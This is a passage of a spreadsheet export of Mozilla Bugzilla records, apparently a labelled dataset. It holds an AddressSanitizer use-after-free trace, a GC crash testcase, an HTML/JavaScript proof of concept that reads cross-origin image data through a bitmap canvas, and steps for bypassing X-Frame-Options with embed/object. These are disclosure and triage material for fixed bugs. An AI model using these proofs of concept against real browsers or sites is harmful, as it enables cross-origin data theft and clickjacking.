    #29 0x7f5389673444 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:65:49
    #30 0x7f5386ef8887 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:499:7
    #31 0x7f5386ec66db in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:284:11
    #32 0x7f5386ed9a42 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:200:22
    #33 0x7f5386ed934f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:15
    #34 0x7f5386ebd2d1 in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:259:32
    #35 0x7f5386eeac50 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #36 0x7f5386ee7698 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #37 0x7f5387c79cd1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #38 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #39 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #40 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #41 0x7f538ce81d0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #42 0x7f539048ba17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #43 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #44 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #45 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #46 0x7f539048b545 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #47 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #48 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #49 0x7f53a260082f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #50 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x612000077db0 is located 112 bytes inside of 296-byte region [0x612000077d40,0x612000077e68)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f538d670105 in nsDocumentViewer::Release() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:559:1
    #2 0x7f538f961a45 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:334:7
    #3 0x7f538f961a45 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:600
    #4 0x7f538f961a45 in nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5872
    #5 0x7f538f9ad32f in non-virtual thunk to nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5796:13
    #6 0x7f5389826da4 in nsFrameLoader::DestroyDocShell() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2144:15
    #7 0x7f5389826b05 in nsFrameLoaderDestroyRunnable::Run() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2082:19
    #8 0x7f538977e5fd in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7279:22
    #9 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #10 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #11 0x7f538987354e in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #12 0x7f538987354e in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2244
    #13 0x7f5389ee8d59 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #14 0x7f5389ee8d59 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
    #15 0x7f5389ee8d59 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
    #16 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #17 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #25 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #26 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #27 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #28 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #29 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #30 0x7f5390945102 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f53912d718b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #32 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f538b54455b in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f538b54455b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f538b510059 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1147:51
    #36 0x7f538b511e23 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1321:20
    #37 0x7f538b4f25c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f538b4f59a2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f538d66f253 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f538d66f253 in NS_NewContentViewer() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:478
    #4 0x7f538df829e2 in nsContentDLF::CreateInstanceForDocument(nsISupports*, nsIDocument*, char const*, nsIContentViewer**) /home/worker/workspace/build/src/layout/build/nsContentDLF.cpp:255:46
    #5 0x7f538f9c8230 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8160:19
    #6 0x7f538f96888f in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8022:17
    #7 0x7f538f99ccb7 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4572:3
    #8 0x7f538f99ccb7 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4570
    #9 0x7f53894e3caa in nsPIDOMWindow&lt;mozIDOMWindowProxy&gt;::MaybeCreateDoc() /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:4117:48
    #10 0x7f538b97432d in GetDoc /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:213:7
    #11 0x7f538b97432d in EnsureInnerWindow /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:954
    #12 0x7f538b97432d in nsJSChannel::AsyncOpen(nsIStreamListener*, nsISupports*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:581
    #13 0x7f538b976599 in nsJSChannel::AsyncOpen2(nsIStreamListener*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:679:10
    #14 0x7f53887a5f38 in nsURILoader::OpenURI(nsIChannel*, unsigned int, nsIInterfaceRequestor*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:857:19
    #15 0x7f538f9786fd in nsDocShell::DoChannelLoad(nsIChannel*, nsIURILoader*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11551:20
    #16 0x7f538f9d98be in nsDocShell::DoURILoad(nsIURI*, nsIURI*, bool, nsIURI*, bool, unsigned int, nsIPrincipal*, nsIPrincipal*, char const*, nsAString const&amp;, nsIInputStream*, nsIInputStream*, bool, nsIDocShell**, nsIRequest**, bool, bool, bool, nsAString const&amp;, nsIURI*, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11365:8
    #17 0x7f538f9754af in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString const&amp;, char const*, nsAString const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString const&amp;, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10804:8
    #18 0x7f538f96c2bb in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1571:10
    #19 0x7f538981112a in nsFrameLoader::ReallyStartLoadingInternal() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:875:19
    #20 0x7f538977e440 in ReallyStartLoading /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:759:17
    #21 0x7f538977e440 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7271
    #22 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #23 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #24 0x7f5389874d2b in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #25 0x7f5389874d2b in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2521
    #26 0x7f5389870f12 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #27 0x7f5389870f12 in nsINode::ReplaceWith(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1831
    #28 0x7f538ac77224 in mozilla::dom::ElementBinding::replaceWith(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3538:9
    #29 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #30 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #31 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #32 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #33 0x7f539092d2ff in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #34 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #35 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #36 0x7f5390945102 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #37 0x7f53912d718b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #38 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45 in operator bool
Shadow bytes around the buggy address:
  0x0c2480006f60: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
  0x0c2480006f70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006f90: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c2480006fa0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c2480006fb0: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2480006fc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c2480006fd0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c248000700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2670==ABORTING</t>
        </is>
      </c>
      <c r="X70" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" t="n">
        <v>1557338</v>
      </c>
      <c r="B71" t="inlineStr">
        <is>
          <t>2019-06-06 07:36:17 -0700</t>
        </is>
      </c>
      <c r="C71" t="inlineStr">
        <is>
          <t>clang trunk builds fail with: TestSprintfLiteral.cpp Line 7: 'snprintf' size argument is too large; destination buffer has size 100, but size argument is 101</t>
        </is>
      </c>
      <c r="D71" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E71" t="n">
        <v>1</v>
      </c>
      <c r="F71" t="n">
        <v>1</v>
      </c>
      <c r="G71" t="n">
        <v>7</v>
      </c>
      <c r="H71" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I71" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J71" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K71" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L71" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M71" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N71" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O71" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P71" t="inlineStr"/>
      <c r="Q71" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R71" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S71" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T71" t="n">
        <v>1</v>
      </c>
      <c r="U71" t="n">
        <v>0</v>
      </c>
      <c r="V71" t="n">
        <v>11</v>
      </c>
      <c r="W71" t="inlineStr">
        <is>
          <t>These checks were added in https://reviews.llvm.org/rC356397.
```
13:53:50     INFO -    File z:/build/build/src/build/clang-plugin/tests/TestSprintfLiteral.cpp Line 7: 'snprintf' size argument is too large; destination buffer has size 100, but size argument is 101
13:53:50     INFO -    File z:/build/build/src/build/clang-plugin/tests/TestSprintfLiteral.cpp Line 11: 'snprintf' size argument is too large; destination buffer has size 100, but size argument is 101
13:53:50     INFO -    File z:/build/build/src/build/clang-plugin/tests/TestSprintfLiteral.cpp Line 30: 'vsnprintf' size argument is too large; destination buffer has size 100, but size argument is 101
13:53:50     INFO -    File z:/build/build/src/build/clang-plugin/tests/TestSprintfLiteral.cpp Line 34: 'vsnprintf' size argument is too large; destination buffer has size 100, but size argument is 101
```
What's the best way to get around this without breaking existing clang 8.0.0 builds?</t>
        </is>
      </c>
      <c r="X71" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" t="n">
        <v>1526218</v>
      </c>
      <c r="B72" t="inlineStr">
        <is>
          <t>2019-02-08 01:28:48 -0800</t>
        </is>
      </c>
      <c r="C72" t="inlineStr">
        <is>
          <t>Tainted canvases can be rendered in a bitmap context</t>
        </is>
      </c>
      <c r="D72" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:28 -0700</t>
        </is>
      </c>
      <c r="E72" t="n">
        <v>1</v>
      </c>
      <c r="F72" t="n">
        <v>1</v>
      </c>
      <c r="G72" t="n">
        <v>3</v>
      </c>
      <c r="H72" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I72" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J72" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K72" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L72" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M72" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N72" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O72" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P72" t="inlineStr">
        <is>
          <t>[adv-main65.0.1+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q72" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R72" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S72" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T72" t="n">
        <v>1</v>
      </c>
      <c r="U72" t="n">
        <v>0</v>
      </c>
      <c r="V72" t="n">
        <v>36</v>
      </c>
      <c r="W72" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36
Steps to reproduce:
If the crossorigin attribute is not specified for an image, the image may be
rendered in a bitmap canvas; the data can be accessced by JavaScript.
A proof of concept is shown below.
```
&lt;html&gt;&lt;body&gt;
  &lt;script charset="utf-8"&gt;
    function getData() {
      createImageBitmap(this, 0, 0, this.naturalWidth,
        this.naturalHeight).then(function(bmap) {
        var can = document.createElement('canvas');
        var ctx = can.getContext('bitmaprenderer');
        ctx.transferFromImageBitmap(bmap);
        document.getElementById('result').textContent = can.toDataURL();
      }); }
  &lt;/script&gt;
  &lt;img src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/&gt;
  &lt;br/&gt;&lt;textarea readonly style="width:100%;height:10em" id="result"&gt;&lt;/textarea&gt;
&lt;/body&gt;&lt;/html&gt;
```
Actual results:
The image, which should not be accessible to JavaScript from origins other than
https://duckduckgo.com is in fact rendered in the tainted canvas and its
base64-encoded contents are displayed.
Images on external domains protected by cookies or IP whitelisting can
therefore be stolen using Cross-site Request Forgery even if the target server
does not give CORS access to other domains.
Expected results:
An error should have been thrown similar to the error shown when rendering tainted canvases in a 2D context:
  "The operation is insecure."</t>
        </is>
      </c>
      <c r="X72" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" t="n">
        <v>1109889</v>
      </c>
      <c r="B73" t="inlineStr">
        <is>
          <t>2014-12-10 14:18:29 -0800</t>
        </is>
      </c>
      <c r="C73" t="inlineStr">
        <is>
          <t>Crash [@ ??] with gczeal and recursion</t>
        </is>
      </c>
      <c r="D73" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:07 -0700</t>
        </is>
      </c>
      <c r="E73" t="n">
        <v>1</v>
      </c>
      <c r="F73" t="n">
        <v>1</v>
      </c>
      <c r="G73" t="n">
        <v>3</v>
      </c>
      <c r="H73" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I73" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J73" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K73" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L73" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M73" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N73" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O73" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P73" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main35+][adv-esr31.4+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q73" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R73" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S73" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T73" t="n">
        <v>1</v>
      </c>
      <c r="U73" t="n">
        <v>0</v>
      </c>
      <c r="V73" t="n">
        <v>21</v>
      </c>
      <c r="W73" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision d7c76fe69e9a (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --enable-debug, run with --no-threads --fuzzing-safe):
var g = newGlobal();
gczeal(2, 1)
function recurse(x) {
	recurse(g.f == this == 3);
};
recurse(0)
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0xf6a9026f in ?? ()
#0  0xf6a9026f in ?? ()
#1  0xffffff82 in ?? ()
eax	0x0	0
ebx	0xffefe2b4	-1056076
ecx	0xffffc5cc	-14900
edx	0x0	0
esi	0xffefe29c	-1056100
edi	0xf6b54ce0	-155890464
ebp	0xffefe2b8	4293911224
esp	0xffefe260	4293911136
eip	0xf6a9026f	4138271343
=&gt; 0xf6a9026f:	cmp    (%eax),%eax
   0xf6a90271:	add    %al,(%eax)
Marking s-s because this crash involves GC and is on the heap.</t>
        </is>
      </c>
      <c r="X73" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" t="n">
        <v>1644076</v>
      </c>
      <c r="B74" t="inlineStr">
        <is>
          <t>2020-06-08 01:01:13 -0700</t>
        </is>
      </c>
      <c r="C74" t="inlineStr">
        <is>
          <t>Bypass x-frame-options and csp frame-ancestors with `&lt;object data=url&gt;` and `&lt;embed src=url&gt;`</t>
        </is>
      </c>
      <c r="D74" t="inlineStr">
        <is>
          <t>2021-06-11 04:03:54 -0700</t>
        </is>
      </c>
      <c r="E74" t="n">
        <v>1</v>
      </c>
      <c r="F74" t="n">
        <v>1</v>
      </c>
      <c r="G74" t="n">
        <v>3</v>
      </c>
      <c r="H74" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I74" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J74" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K74" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L74" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M74" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N74" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O74" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P74" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q74" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R74" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S74" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T74" t="n">
        <v>1</v>
      </c>
      <c r="U74" t="n">
        <v>0</v>
      </c>
      <c r="V74" t="n">
        <v>23</v>
      </c>
      <c r="W74" t="inlineStr">
        <is>
          <t>Commonly, websites use a response header like `X-Frame-Options: DENY` or CSP's `frame-ancestors` directive to disallow being embedded across origins.
It seems that this restriction can be easily bypassed with embeds like `&lt;object data=url&gt;` or `&lt;embed src=url&gt;`.
STR: 
1. Find a website that disallows framing (i.e., `X-Frame-Options` set to `DENY` or `SAMEORIGIN` or has a CSP directive that does the same). This example will use https://accounts.google.com
2. Embed on a different origin using embed or object elements. Example:
`data:text/html,embed:&lt;embed src="https://accounts.google.com"&gt;&lt;hr&gt;object:&lt;object data="https://accounts.google.com"&gt;`
3. Observe how both frames are loading successfully.
